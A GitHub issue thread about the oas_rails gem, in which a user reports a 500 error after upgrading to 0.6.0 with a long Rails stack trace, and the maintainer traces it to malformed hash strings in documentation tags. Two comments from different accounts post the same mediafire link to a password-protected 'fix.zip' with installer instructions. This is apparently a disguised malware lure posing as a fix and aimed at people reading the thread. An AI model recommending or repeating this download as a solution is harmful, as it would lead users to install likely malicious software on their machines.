### ISSUE TITLE
500 Error after update to 0.6.0 

### ISSUE THREAD

**Issue by Metalzoid** [a-chacon/oas_rails#44]
Hi ! 

I've a new issue :( 

After update the version to 0.6.0, i get 500 Error. 
The logs : 

```shell
Started GET "/docs.json" for ::1 at 2024-08-26 10:10:41 +0200
Processing by OasRails::OasRailsController#index as JSON
Completed 500 Internal Server Error in 28ms (ActiveRecord: 0.0ms | Allocations: 17732)


  
SyntaxError ((eval at /home/gagnaire/.rbenv/versions/3.3.0/lib/ruby/gems/3.3.0/gems/oas_rails-0.6.0/lib/oas_rails/yard/oas_rails_factory.rb:111):1: syntax error, unexpected '}'):
  
oas_rails (0.6.0) lib/oas_rails/yard/oas_rails_factory.rb:111: (eval at /home/gagnaire/.rbenv/versions/3.3.0/lib/ruby/gems/3.3.0/gems/oas_rails-0.6.0/lib/oas_rails/yard/oas_rails_factory.rb:111):1: syntax error, unexpected '}'
oas_rails (0.6.0) lib/oas_rails/yard/oas_rails_factory.rb:111:in `eval'
oas_rails (0.6.0) lib/oas_rails/yard/oas_rails_factory.rb:111:in `eval_content'
oas_rails (0.6.0) lib/oas_rails/yard/oas_rails_factory.rb:61:in `extract_description_type_and_content'
oas_rails (0.6.0) lib/oas_rails/yard/oas_rails_factory.rb:18:in `parse_tag_with_request_body_example'
yard (0.9.36) lib/yard/tags/library.rb:237:in `send_to_factory'
yard (0.9.36) lib/yard/tags/library.rb:169:in `request_body_example_tag'
yard (0.9.36) lib/yard/tags/library.rb:274:in `tag_create'
yard (0.9.36) lib/yard/docstring_parser.rb:215:in `create_tag'
yard (0.9.36) lib/yard/docstring_parser.rb:156:in `block in parse_content'
yard (0.9.36) lib/yard/docstring_parser.rb:142:in `each'
yard (0.9.36) lib/yard/docstring_parser.rb:142:in `each_with_index'
yard (0.9.36) lib/yard/docstring_parser.rb:142:in `parse_content'
yard (0.9.36) lib/yard/docstring_parser.rb:117:in `parse'
oas_rails (0.6.0) lib/oas_rails/oas_route.rb:28:in `extract_docstring'
oas_rails (0.6.0) lib/oas_rails/oas_route.rb:23:in `extract_rails_route_data'
oas_rails (0.6.0) lib/oas_rails/oas_route.rb:11:in `new_from_rails_route'
oas_rails (0.6.0) lib/oas_rails/extractors/route_extractor.rb:82:in `block in extract_host_routes'
oas_rails (0.6.0) lib/oas_rails/extractors/route_extractor.rb:82:in `map'
oas_rails (0.6.0) lib/oas_rails/extractors/route_extractor.rb:82:in `extract_host_routes'
oas_rails (0.6.0) lib/oas_rails/extractors/route_extractor.rb:29:in `host_routes'
oas_rails (0.6.0) lib/oas_rails/extractors/route_extractor.rb:41:in `host_paths'
oas_rails (0.6.0) lib/oas_rails/spec/specification.rb:24:in `build'
oas_rails (0.6.0) lib/oas_rails.rb:67:in `build'
oas_rails (0.6.0) app/controllers/oas_rails/oas_rails_controller.rb:9:in `block (2 levels) in index'
actionpack (7.1.4) lib/action_controller/metal/mime_responds.rb:214:in `respond_to'
oas_rails (0.6.0) app/controllers/oas_rails/oas_rails_controller.rb:6:in `index'
actionpack (7.1.4) lib/action_controller/metal/basic_implicit_render.rb:6:in `send_action'
actionpack (7.1.4) lib/abstract_controller/base.rb:224:in `process_action'
actionpack (7.1.4) lib/action_controller/metal/rendering.rb:165:in `process_action'
actionpack (7.1.4) lib/abstract_controller/callbacks.rb:259:in `block in process_action'
activesupport (7.1.4) lib/active_support/callbacks.rb:121:in `block in run_callbacks'
turbo-rails (2.0.6) lib/turbo-rails.rb:24:in `with_request_id'
turbo-rails (2.0.6) app/controllers/concerns/turbo/request_id_tracking.rb:10:in `turbo_tracking_request_id'
activesupport (7.1.4) lib/active_support/callbacks.rb:130:in `block in run_callbacks'
actiontext (7.1.4) lib/action_text/rendering.rb:23:in `with_renderer'
actiontext (7.1.4) lib/action_text/engine.rb:69:in `block (4 levels) in <class:Engine>'
activesupport (7.1.4) lib/active_support/callbacks.rb:130:in `instance_exec'
activesupport (7.1.4) lib/active_support/callbacks.rb:130:in `block in run_callbacks'
activesupport (7.1.4) lib/active_support/callbacks.rb:141:in `run_callbacks'
actionpack (7.1.4) lib/abstract_controller/callbacks.rb:258:in `process_action'
actionpack (7.1.4) lib/action_controller/metal/rescue.rb:25:in `process_action'
actionpack (7.1.4) lib/action_controller/metal/instrumentation.rb:74:in `block in process_action'
activesupport (7.1.4) lib/active_support/notifications.rb:206:in `block in instrument'
activesupport (7.1.4) lib/active_support/notifications/instrumenter.rb:58:in `instrument'
activesupport (7.1.4) lib/active_support/notifications.rb:206:in `instrument'
actionpack (7.1.4) lib/action_controller/metal/instrumentation.rb:73:in `process_action'
actionpack (7.1.4) lib/action_controller/metal/params_wrapper.rb:261:in `process_action'
activerecord (7.1.4) lib/active_record/railties/controller_runtime.rb:32:in `process_action'
actionpack (7.1.4) lib/abstract_controller/base.rb:160:in `process'
actionview (7.1.4) lib/action_view/rendering.rb:40:in `process'
actionpack (7.1.4) lib/action_controller/metal.rb:227:in `dispatch'
actionpack (7.1.4) lib/action_controller/metal.rb:309:in `dispatch'
actionpack (7.1.4) lib/action_dispatch/routing/route_set.rb:49:in `dispatch'
actionpack (7.1.4) lib/action_dispatch/routing/route_set.rb:32:in `serve'
actionpack (7.1.4) lib/action_dispatch/journey/router.rb:51:in `block in serve'
actionpack (7.1.4) lib/action_dispatch/journey/router.rb:131:in `block in find_routes'
actionpack (7.1.4) lib/action_dispatch/journey/router.rb:124:in `each'
actionpack (7.1.4) lib/action_dispatch/journey/router.rb:124:in `find_routes'
actionpack (7.1.4) lib/action_dispatch/journey/router.rb:32:in `serve'
actionpack (7.1.4) lib/action_dispatch/routing/route_set.rb:882:in `call'
railties (7.1.4) lib/rails/engine.rb:536:in `call'
railties (7.1.4) lib/rails/railtie.rb:226:in `public_send'
railties (7.1.4) lib/rails/railtie.rb:226:in `method_missing'
actionpack (7.1.4) lib/action_dispatch/routing/mapper.rb:31:in `block in <class:Constraints>'
actionpack (7.1.4) lib/action_dispatch/routing/mapper.rb:60:in `serve'
actionpack (7.1.4) lib/action_dispatch/journey/router.rb:51:in `block in serve'
actionpack (7.1.4) lib/action_dispatch/journey/router.rb:131:in `block in find_routes'
actionpack (7.1.4) lib/action_dispatch/journey/router.rb:124:in `each'
actionpack (7.1.4) lib/action_dispatch/journey/router.rb:124:in `find_routes'
actionpack (7.1.4) lib/action_dispatch/journey/router.rb:32:in `serve'
actionpack (7.1.4) lib/action_dispatch/routing/route_set.rb:882:in `call'
omniauth (2.1.2) lib/omniauth/strategy.rb:202:in `call!'
omniauth (2.1.2) lib/omniauth/strategy.rb:169:in `call'
warden-jwt_auth (0.10.0) lib/warden/jwt_auth/middleware/token_dispatcher.rb:20:in `call'
warden-jwt_auth (0.10.0) lib/warden/jwt_auth/middleware/revocation_manager.rb:21:in `call'
rack (3.1.7) lib/rack/builder.rb:277:in `call'
warden-jwt_auth (0.10.0) lib/warden/jwt_auth/middleware.rb:22:in `call'
rack-attack (6.7.0) lib/rack/attack.rb:127:in `call'
rack (3.1.7) lib/rack/method_override.rb:28:in `call'
rack-session (2.0.0) lib/rack/session/abstract/id.rb:272:in `context'
rack-session (2.0.0) lib/rack/session/abstract/id.rb:266:in `call'
actionpack (7.1.4) lib/action_dispatch/middleware/cookies.rb:689:in `call'
warden (1.2.9) lib/warden/manager.rb:36:in `block in call'
warden (1.2.9) lib/warden/manager.rb:34:in `catch'
warden (1.2.9) lib/warden/manager.rb:34:in `call'
rack (3.1.7) lib/rack/tempfile_reaper.rb:20:in `call'
rack (3.1.7) lib/rack/etag.rb:29:in `call'
rack (3.1.7) lib/rack/conditional_get.rb:31:in `call'
rack (3.1.7) lib/rack/head.rb:15:in `call'
actionpack (7.1.4) lib/action_dispatch/http/permissions_policy.rb:36:in `call'
actionpack (7.1.4) lib/action_dispatch/http/content_security_policy.rb:33:in `call'
rack-session (2.0.0) lib/rack/session/abstract/id.rb:272:in `context'
rack-session (2.0.0) lib/rack/session/abstract/id.rb:266:in `call'
actionpack (7.1.4) lib/action_dispatch/middleware/cookies.rb:689:in `call'
activerecord (7.1.4) lib/active_record/migration.rb:655:in `call'
actionpack (7.1.4) lib/action_dispatch/middleware/callbacks.rb:29:in `block in call'
activesupport (7.1.4) lib/active_support/callbacks.rb:101:in `run_callbacks'
actionpack (7.1.4) lib/action_dispatch/middleware/callbacks.rb:28:in `call'
actionpack (7.1.4) lib/action_dispatch/middleware/executor.rb:14:in `call'
actionpack (7.1.4) lib/action_dispatch/middleware/actionable_exceptions.rb:16:in `call'
actionpack (7.1.4) lib/action_dispatch/middleware/debug_exceptions.rb:29:in `call'
actionpack (7.1.4) lib/action_dispatch/middleware/show_exceptions.rb:31:in `call'
railties (7.1.4) lib/rails/rack/logger.rb:37:in `call_app'
railties (7.1.4) lib/rails/rack/logger.rb:24:in `block in call'
activesupport (7.1.4) lib/active_support/tagged_logging.rb:139:in `block in tagged'
activesupport (7.1.4) lib/active_support/tagged_logging.rb:39:in `tagged'
activesupport (7.1.4) lib/active_support/tagged_logging.rb:139:in `tagged'
activesupport (7.1.4) lib/active_support/broadcast_logger.rb:241:in `method_missing'
railties (7.1.4) lib/rails/rack/logger.rb:24:in `call'
sprockets-rails (3.5.2) lib/sprockets/rails/quiet_assets.rb:17:in `call'
actionpack (7.1.4) lib/action_dispatch/middleware/remote_ip.rb:92:in `call'
actionpack (7.1.4) lib/action_dispatch/middleware/request_id.rb:28:in `call'
rack (3.1.7) lib/rack/method_override.rb:28:in `call'
rack (3.1.7) lib/rack/runtime.rb:24:in `call'
activesupport (7.1.4) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call'
actionpack (7.1.4) lib/action_dispatch/middleware/server_timing.rb:59:in `block in call'
actionpack (7.1.4) lib/action_dispatch/middleware/server_timing.rb:24:in `collect_events'
actionpack (7.1.4) lib/action_dispatch/middleware/server_timing.rb:58:in `call'
actionpack (7.1.4) lib/action_dispatch/middleware/executor.rb:14:in `call'
actionpack (7.1.4) lib/action_dispatch/middleware/static.rb:25:in `call'
rack (3.1.7) lib/rack/sendfile.rb:114:in `call'
actionpack (7.1.4) lib/action_dispatch/middleware/host_authorization.rb:141:in `call'
rack-cors (2.0.2) lib/rack/cors.rb:102:in `call'
railties (7.1.4) lib/rails/engine.rb:536:in `call'
puma (6.4.2) lib/puma/configuration.rb:272:in `call'
puma (6.4.2) lib/puma/request.rb:100:in `block in handle_request'
puma (6.4.2) lib/puma/thread_pool.rb:378:in `with_force_shutdown'
puma (6.4.2) lib/puma/request.rb:99:in `handle_request'
puma (6.4.2) lib/puma/server.rb:464:in `process_client'
puma (6.4.2) lib/puma/server.rb:245:in `block in run'
puma (6.4.2) lib/puma/thread_pool.rb:155:in `block in spawn_thread'
``` 

my config : 

```ruby
config.default_tags_from = :controller

  # Automatically detect request bodies for create/update methods
  # Default: true
  # config.autodiscover_request_body = false

  # Automatically detect responses from controller renders
  # Default: true
  config.autodiscover_responses = false

  # API path configuration if your API is under a different namespace
  config.api_path = "/api/v1/"

  # #######################
  # Authentication Settings
  # #######################

  # Whether to authenticate all routes by default
  # Default is true; set to false if you don't want all routes to include secutrity schemas by default
  config.authenticate_all_routes_by_default = false

  # Default security schema used for authentication
  # Choose a predefined security schema
  # [:api_key_cookie, :api_key_header, :api_key_query, :basic, :bearer, :bearer_jwt, :mutual_tls]
  config.security_schema = :bearer_jwt

  # Custom security schemas
  # You can uncomment and modify to use custom security schemas
  # Please follow the documentation: https://spec.openapis.org/oas/latest.html#security-scheme-object
  #
  # config.security_schemas = {
  #  bearer:{
  #   "type": "apiKey",
  #   "name": "api_key",
  #   "in": "header"
  #  }
  # }

  # ###########################
  # Default Responses (Errors)
  # ###########################

  # The default responses errors are setted only if the action allow it.
  # Example, if you add forbidden then it will be added only if the endpoint requires authentication.
  # Example: not_found will be setted to the endpoint only if the operation is a show/update/destroy action.
  config.set_default_responses = false
  # config.possible_default_responses = [:not_found, :unauthorized, :forbidden]
  # config.response_body_of_default = { message: String }

``` 

Thanks :)

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by a-chacon** [comment]
Did you add some `@response_example` tags? Or it's failing just after the update?

The problem is when eval is transforming strings like `"{message: false, ...}"`. You know? hash strings used in the `@request_body_example` and now in the `@response_example` tags. Please review if that hashes are ok and then we review this again. 

Still, this error must be cached and maybe display in a better way.

**Comment by Metalzoid** [comment]
i just updated. i haven't had time to use @response_example yet. i'll try tomorrow

**Comment by Metalzoid** [comment]
It's just me don't read correctly documentation :-1:
